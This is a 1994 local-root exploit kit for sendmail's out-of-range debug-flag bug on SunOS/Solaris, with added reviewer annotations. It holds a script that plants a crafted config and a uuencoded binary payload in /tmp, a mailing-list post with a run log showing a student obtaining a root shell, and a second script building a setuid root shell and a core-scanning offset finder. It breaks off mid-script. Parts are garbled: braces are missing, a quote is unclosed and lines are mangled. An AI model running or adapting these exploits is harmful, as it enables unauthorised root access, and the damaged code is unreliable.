
# NOTE(review): 1994 exploit script for out-of-range sendmail -d debug-flag
# indices on SunOS/Solaris, kept as a historical artifact; nothing here is
# maintained.  Every step leaves a detection artifact on the host: the files
# /tmp/sendmail.cf, /tmp/mail/, /tmp/in.telnet and a mode-666 /tmp/newsh, and
# a sendmail process started with -d and ten-digit indices beginning 42949.
# usage:  smdhole [/path/to/suid/sendmail]

#

# add /usr/ucb to path so solaris can find `whoami` (4/18/94)

# NOTE(review): this file is Bourne shell (if/then/fi below), where `path` is an
# ordinary variable; command lookup uses PATH, so this line changes nothing
# about where whoami is found.
path=$path:/usr/ucb

# "$1x = x" is the pre-[ -z ] idiom for "no first argument"; $1 is unquoted, so
# a path containing whitespace breaks the test.
if [ $1x = x ]; then

        sendmail=/usr/lib/sendmail

else

        echo "Trying to abuse $1."

        sendmail=$1

fi

# Size in bytes of the sendmail binary: fields 4 and 5 of the space-collapsed
# ls -l line (presumably group and size), with non-digits stripped.  The case
# table below is keyed on this value.
# NOTE(review): the double quote opened before s/[^0-9]//g is never closed in
# this copy — presumably lost in transcription.
sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g`

# prefix and suffix for -1 as unsigned integer.  Actually, this is

# off by two.  you figure out why.

# prefix + the five-digit table values below = 32-bit values just under 2^32.
# suffix is never referenced anywhere in this script.
prefix=42949

suffix=67297

# Dispatch on the binary's size.  Each arm hard-codes three consecutive debug
# indices n1..n3; where two builds share a size a second set n4..n6 is also
# set, but the sendmail invocation at the end of this script only ever uses
# n1..n3.
case $sm_size in

        132064)

                n1=${prefix}52864

                n2=${prefix}52865

                n3=${prefix}52866

                echo Patched solaris w/o mx.

                ;;

        134752) # ug! dropped a 0 before.  fixed 4/18/94

                n1=${prefix}01656

                n2=${prefix}01657

                n3=${prefix}01658

                echo Patched solaris sendmail.mx

                ;;

        130860)

                n1=${prefix}53016

                n2=${prefix}53017

                n3=${prefix}53018

                echo Un-patched solaris w/o mx.

                ;;

        133548) # ug! dropped a 0 before.  fixed 4/18/94

                n1=${prefix}01808

                n2=${prefix}01809

                n3=${prefix}01810

                echo Un-patched solaris sendmail.mx

                ;;

        139264)

                n1=${prefix}49609

                n2=${prefix}49610

                n3=${prefix}49611

                echo Sun 4.1.3 sendmail - could be either of two versions

                n4=${prefix}49265

                n5=${prefix}49266

                n6=${prefix}49267

                ;;

        155648)

                n1=${prefix}46953

                n2=${prefix}46954

                n3=${prefix}46955

                echo Sun 4.1.3 sendmail.mx - could be either of two versions

                n4=${prefix}46609

                n5=${prefix}46610

                n6=${prefix}46611

                ;;

        *)   # unknown size: list other setuid sendmail binaries and stop

                echo "I don't know what version of sendmail $sendmail is."

                echo -n "Look for other versions of sendmail[.mx] on the "

                echo "system and re-run this as:"

                echo "     $0 /path/to/another/suid/sendmail"

                echo

                echo "Let me see if I can suggest anything..."

                # NOTE(review): the "-ls 2>/dev/null" on the following line is the
                # tail of this find command, wrapped in transcription; as printed
                # it is a separate command that fails.
                find /usr/lib /var/sadm/patch -name "*sendm*" -perm -4001

-ls 2>/dev/null

                exit 1

                ;;

        esac

# Crafted config written to /tmp.  Both mailers below name /tmp/in.telnet as
# their delivery program (P=), which is the indicator to look for.  The
# heredoc is unquoted, so the \$ escapes are what keep the $ literal.
cat << EOM > /tmp/sendmail.cf

DMether

DRlocalhost

CRlocalhost

CDMailer-Daemon root daemon uucp

DlFrom \$g  \$d

Do.:%@!^=/[]

Dq\$g\$?x (\$x)\$.

De\$j nothing

OA./aliases

OF0666

Og1

OL0

Oo

OPPostmaster

OQ.

Os

Ou1

T root daemon uucp

H?F?From: nobody

Mlocal, P=/tmp/in.telnet, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u

Mprog,  P=/tmp/in.telnet,   F=lsDFMeuP,  S=10, R=20, A=sh -c \$u

S0

R\$+                    \$#local \$:\$1                 just rewrite

EOM

# The script carries a uuencoded payload after its last command, every line
# tagged with "atreus"; strip the tag and decode it (into /tmp/in.telnet.Z,
# judging by the next line).  The decoded binary is opaque here.
cat $0 | sed "s:atreus::" | uudecode

uncompress /tmp/in.telnet.Z

chmod 755 /tmp/in.telnet

mkdir /tmp/mail

cp /tmp/sendmail.cf /tmp/mail

# World-writable copy of the shell under /tmp — a mode-666 executable in /tmp
# is exactly what a periodic integrity or permission scan should flag.
cp /bin/sh /tmp/newsh

chmod 666 /tmp/newsh

$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami`  <Q2RA)! %(atreus

M5$,).9]$%38!E!= H,(LP$LV*KJ*8(15)".N(AI2!6Q*(@ HPM6U6<4A@716atreus

M+H@"%QQ:D@!. ":U%L;2T'36E%H$D 0 H"!ML><#H0N.!B?A-(#4!5>PGGT9atreus

M068Z7==^%;%A[ BS!U6]5@P*#4V;. $L*)YY,P%@$LP"B' [-X#=O=56&'N!atreus

M]4'J<$(""V!.*1]U2@&Q4TJHY5J8,@FC%"+^00 3&, (" HC_B$@" 1@D*$@atreus

M))R!$, GQ!0$'1^!' ,. H&@4;"CP$@ EIKMFFatreus

MG%-6>24;66X)0AMAP %'&FZ< 8(98:3!1AURE)'G0A3TR::;<'H)IIADXKG0atreus

M"W2T <<+;I1QQQQH%#35+Y",%40(+OET@!X5 @ )!2)  AT MN;AF:Z\Q@K atreus

M 7F8E4([MJZ1:X<?AOC0JY DAY( ((!3UR__$-: )!)D"XT 8%!FEXLY)3"Latreus

M)>02\*LD[8X+Q )U'20!M_U\!$H DDB24W8*6"M*N."$H@(8 D!#P'B?P&03atreus

M0J 0\@,_,N"K\'C0@BBB5%15>Y(TV')3%QCH I  *.%R  0BI51#1!36 $ 
4(1>7X0Y$5)%M!!R"TL$L(50[ atreus

MI8N8&A"-4WJ:/7H#?P%H]060%G&Z00P!DP-, 8NA9 D\&B*,Gatreus

M"Y$-X$=!(M1=D R9%R"'4$06M$/F!^0@E$)%? ^*GDO@R0% IQ I") %>LI"atreus

M9 A@BH*,@!0("0-/B**G-)"/#GJ20^9,(Q1H((00HSM ')Z'D$F,3@#3$ HXatreus

M$"**R!@@#P[$ D)JX<)$L&^%!4%&_/X'+&1\H0QT* ,>,/A#,H2!#F$ P _=atreus

M0 8 S &):G(B%.GP!3.PX0U'5.(/\9 &(B**44HL@QOLD(8RN4&+1,B"$X+0atreus

MA"0,(8Q<).(8T-"&-S3Q"W-\PQW.^(4^?I&/X88M=U*(0N_@%atreus

M,M2A#6W(0R/+,(:L]?$+0Z#"$Z3P!28D80I4Z*,6OT $37+2DZ 4Y27)\(8Oatreus

MG.&*8@@#&_!(AS?(80ZC9*4K82G+1M;REHJ,8R,?&1"=*T8I:]*(8S:A&-\K1CGKTHR -
J4A'2M*2FO2D*$VI2E?*TI:Z]*4Patreus

MC:E,9TK3FMKTICC-J4YWRM.>^O2G0 VJ4(=*U*(:]:A(3:I2E\K4ICKUJ5"-atreus

MJE2G2M6J6O6J6,VJ5K?*U:YZ]:M@#:M8QTK6LIKUK&A-JUK7RM:VNO6M<(VKatreus

M7.=*U[K:]:YXS>M2_0,$UP&+!"'V!BPN"(5D !B !W4"6)U0;R&5*P Ratreus

M$()#[@$ L3XQ7"" 0;*HO H43OL'/SQ+%= ^+1]!"YT(VN=*=+atreus

MW>I:][K8S:YVM\O=[GKWN^ -KWC'2][RFO>\Z$VO>M?+WO:Z][WPC:]\YTO?atreus

+^MKWOOC-KW[WFUS=atreus

 atreus

endatreus

----------------------- CuT HeRe -------------------------------------

Here is the other script:

/* What follows is a sample run exercising the latest sendmail hole and the
script used to exploit this hole. This is a re-send; I neglected to escape
the "." in the sendmail script, leaving the program slightly truncated. To
fix this, I have escaped the . so prior to executing this you must remove
the \. (does that make any sense? :-) There was also a small problem with
nested quotes pointed out by Peter Wemm which I have fixed.

This is the "small version" of the script; it assumes you have a sane
sendmail.cf. In this manner, it is not a particularly robust "breakin
script" but I believe it does illustrate how to exploit the bug.

This program uses "calc.c," the program mentioned by Timothy Newsham in an
earlier message. The program has been modified slightly so that it gives
better results (it would occasionally fail to locate the offset of a config
given a buggy sendmail. The fix is to force a sync() after it generates a
coredump.) The remainder of the program was written by myself and a fellow
student, Steven Dake.

We have held off on releasing this script until we were able to notify the
people responsible for system security at NAU. Locals subscribing to this
digest beware; sendmail on our machines has been patched! :-) */

Script started on Thu Mar 24 00:54:54 1994

[pine] [1] date

Thu Mar 24 00:54:57 MST 1994

[pine] [2] whoami

jwa

[pine] [3] id

uid=4473(jwa) gid=400(student)

[pine] [4] ls -l sendbug.sh

-rwx------   1 jwa      student     4893 Mar 24 00:46 sendbug.sh*

[pine] [5] sendbug.sh

Creating setid0 ...

Creating calc...

Scanning core image for /nau/local/lib/mail/sendmail.cf...

Creating alias.sh ...

Creating fake alias file...

Faking alias pointer in new config file...

Creating the sendmail script...

Executing /usr/lib/sendmail -

d4294935548.47,4294935549.116,4294935550.109,4294935551.112,4294935552.47,429493
5553.115,429

4935554.109,4294935555.46,4294935556.9

Version 8.6.4

220-pine.cse.nau.edu Sendmail 8.6.4/WHOOP-v1.0 ready at Thu, 24 Mar 1994

00:55:21 -0700

220 ESMTP spoken here

250 pine.cse.nau.edu Hello jwa@localhost, pleased to meet you

250 ... Sender ok

250 ... Recipient ok

354 Enter mail, end with "." on a line by itself

250 AAA01803 Message accepted for delivery

503 Need MAIL before RCPT

503 Need MAIL command

500 Command unrecognized

500 Command unrecognized

221 pine.cse.nau.edu closing connection

setid0 is a suid shell.  executing...

executing /bin/csh...

pine# whoami

root

pine# id

uid=0(root) gid=0(root)

pine# exit

pine# end of script.

. and here's the program.

#!/bin/sh

# exploit new sendmail bug to give us a root shell

# 24 mar 94  jwa/scd @nau.edu

# "short version"

# tested on sunos 5.2/sendmail 8.6.4

# location of sendmail

SENDMAIL=/usr/lib/sendmail

# location of original sendmail.cf file

CONFIG=/nau/local/lib/mail/sendmail.cf

#CONFIG=`strings $SENDMAIL | grep sendmail.cf`

# program to execute as root

SHELL=/bin/csh

TEMPDIR=/tmp/sendbug-tmp.$$

mkdir $TEMPDIR

chmod 700 $TEMPDIR

cd $TEMPDIR

cp $SENDMAIL sm

chmod 700 sm

echo "Creating setid0 ..."

cat > setid.c << _EOF_

/* set uid to zero, thus escaping the annoying csh and solaris sh

 * problem..

 *

 * if (getuid() != geteuid()) {

 *  printf("permission denied, you root-hacker you.\n");

 *  exit(1);

 * }

 *

 * .. must be run euid 0, obviously.  with no args it runs /bin/sh,

 * otherwise it runs the 1st arg.

 */

#include <stdio.h>

/* NOTE(review): the opening brace after the K&R declarators and the function's
 * closing brace are missing in this copy (the page dropped the lines that held
 * them), so the text as printed does not compile.  The implicit int return and
 * the implicit declarations of setuid/getuid/exit/system (no <unistd.h> or
 * <stdlib.h>) were accepted by the 1994 compilers this targeted; they are
 * errors under C99 and later. */
main(argc, argv)

int argc;

char *argv[];

 int uid;

 setuid(0);   /* return values of the four set*id calls are ignored; only the
                 getuid() check below notices a failed setuid(0), a failed
                 setgid(0) goes unnoticed */

 setgid(0);

 seteuid(0);  /* probably redundant. */

 setegid(0);

 uid = getuid();

 if (uid != 0) {

  printf("setuid(0); failed!  aborting..\n");

  exit(1);

 }

 if (argc !=2) {

  /* no argument: interactive shell through system(), which inherits the
   * caller's environment unchanged */
  printf("executing /bin/sh...\n");

  system("/bin/sh");

 }

  else

 {

  printf("executing %s...\n", argv[1]);   /* argv[1] goes to a shell unchecked */

  system(argv[1]);

 }

_EOF_

cc -o setid0 setid.c

echo "Creating calc..."

cat > calc.c << _EOF_

/*

 * Determines offset in sendmail of

 * sendmail.cf file location.

 * author: timothy newsham

 */

#include <fcntl.h>

/* Runs the private copy of sendmail (./sm) with stdout in ./out and stdin on a
 * pipe that is never written, then sends it signal 11 after two seconds so it
 * leaves a core file for main() to search.  The return value is meaningless:
 * implicit int, and the normal path returns nothing.
 * NOTE(review): the `{` after the signature and the closing `}` are missing in
 * this copy — the page dropped brace-only lines.
 */
gencore()

  int pid;

  int fd[2];

  if(pipe(fd) < 0) {

    perror("pipe");

    exit(1);

    return(0);   /* unreachable after exit(1) */

  }

  /* NOTE(review): a fork() failure (-1) is not handled; it would take the
   * parent branch below and kill(-1, 11) every process the caller may signal */
  pid = fork();

  if(!pid) {   /* child */

    int f = open("./out", O_RDWR|O_CREAT, 0666);   /* unchecked: on -1 the dup2 fails silently */

    dup2(f, 1); dup2(fd[0], 0);

    close(f); close(fd[1]); close(fd[0]);

    /* terminating argument should be (char *)0; a bare 0 only works where
     * int and pointer have the same size */
    execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);

    perror("exec");

    exit(0);

  } else {   /* parent: no wait(), just a fixed sleep before the signal */

    sleep(2);

    kill(pid, 11);   /* 11 is SIGSEGV on the targeted systems; <signal.h> would spell it */

  }

  close(fd[0]);

  close(fd[1]);

/* Prints the -d argument the surrounding shell script captures: the offset of
 * the config-file path inside the core, as located by find(), then offset+k
 * paired with each character of "/tmp/sm.cf" and a final ".0" terminator.
 * argv[1] is the path to search for and is used unchecked; running with no
 * argument passes NULL to find().
 * NOTE(review): the `{` after the declarators and the closing `}` are missing
 * in this copy (brace-only lines were dropped).  ConfFile/tTdvect/off are
 * unsigned while find() returns int.
 */
main(argc,argv)

char **argv;

int argc;

  unsigned int ConfFile,tTdvect,off;

  gencore();

  sync();   /* grr. -- flush the core to disk before reading it; without this
               find() could see a partial core (see the note above the script) */

  /* presumably the debug-level vector, which the -d0-9.90 in gencore() filled
   * with the value 90, ASCII 'Z' — confirm against the sendmail source */
  tTdvect = find("ZZZZZZZZ", "core");

  ConfFile = find(argv[1], "core");

  /* find() returns 0 both for "not found" and for a match at offset 0 */
  if(!tTdvect || !ConfFile) {

   return(1);

  }

  off = ConfFile - tTdvect;   /* both values carry find()'s one-byte bias, which cancels here */



/* no return on the normal path (implicit int main); the caller only captures
 * stdout and ignores the exit status */
printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n",  
off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \

  off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10);

/* Byte-by-byte scan of `file` for the first occurrence of `pattern`.
 * Returns the match's start offset minus one (addr still counts the last
 * matched byte when strlen(pattern) is subtracted), or 0 when the pattern is
 * not found — so a match at the very start is indistinguishable from "not
 * found".  main() only uses the difference of two results, where the bias
 * cancels.
 * Known defects, left as-is: on a mismatch i is reset to 0 without re-testing
 * the current byte against pattern[0], so a pattern whose prefix repeats
 * ("aab" in "aaab") can be missed; the descriptor is never closed; open()
 * failure is not checked (read() then fails and 0 is returned); strlen() is
 * used without <string.h>.
 * NOTE(review): the `{` after the declarators and the closing `}` are missing
 * in this copy — brace-only lines were dropped by the page.
 */
int find(pattern, file)

char *pattern,*file;

  int fd;

  int i, addr;   /* i: bytes of pattern matched so far; addr: index of the byte under examination */

  char c;

  fd = open(file, 0);   /* 0 == O_RDONLY; <fcntl.h> is included, so the name was available */

  i = 0;

  addr = 0;

  while(read(fd, &c, 1) == 1) {

    if(pattern[i] == c)

      i++;

    else

      i=0;   /* see the prefix-repeat defect noted above */

    if(pattern[i] == '\0') {

      addr -= strlen(pattern);

      return(addr);

    }

    addr++;

  }

  return(0);

_EOF_

cc calc.c -o calc

echo "Scanning core image for $CONFIG..."

DEBUGFLAGS=`calc $CONFIG`

echo "Creating alias.sh ..."

echo "#!/bin/sh

# this program will be executed when mail is sent to the fake alias.
